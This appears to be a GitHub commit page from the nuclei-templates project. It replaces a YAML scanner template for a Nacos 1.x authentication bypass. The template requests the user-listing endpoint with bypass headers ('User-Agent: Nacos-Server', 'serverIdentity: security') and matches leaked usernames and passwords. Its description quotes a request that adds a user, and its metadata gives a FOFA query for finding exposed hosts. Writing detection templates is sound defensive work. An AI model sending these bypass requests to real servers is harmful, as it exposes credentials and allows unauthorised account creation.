Merge pull request #8053 from projectdiscovery/nacos-auth-bypass
Create nacos-auth-bypass.yamlpatch-1
pussycat0x
GitHub
commit
119ce40a16
|
|
@ -1,40 +0,0 @@
|
|||
id: unauthenticated-nacos-access
|
||||
|
||||
info:
|
||||
name: Nacos 1.x - Authentication Bypass
|
||||
author: taielab,pikpikcu
|
||||
severity: critical
|
||||
description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
|
||||
reference:
|
||||
- https://github.com/alibaba/nacos/issues/4593
|
||||
- https://nacos.io/en-us/docs/auth.html
|
||||
tags: nacos,unauth,misconfig
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
|
||||
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
|
||||
headers:
|
||||
User-Agent: Nacos-Server
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Type: application/json"
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '"username":'
|
||||
- '"password":'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
@ -0,0 +1,46 @@
|
|||
id: nacos-auth-bypass
|
||||
|
||||
info:
|
||||
name: Nacos 1.x - Authentication Bypass
|
||||
author: taielab,pikpikcu,SleepingBag945
|
||||
severity: critical
|
||||
description: |
|
||||
Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data.
|
||||
reference:
|
||||
- https://github.com/alibaba/nacos/issues/4593
|
||||
- https://nacos.io/en-us/docs/auth.html
|
||||
- https://zhuanlan.zhihu.com/p/602021283
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: app="NACOS"
|
||||
tags: nacos,auth-bypass
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
|
||||
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
|
||||
headers:
|
||||
serverIdentity: security
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"totalCount":'
|
||||
- '"username":'
|
||||
- '"password":'
|
||||
- '"pagesAvailable":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
Loading…
Reference in New Issue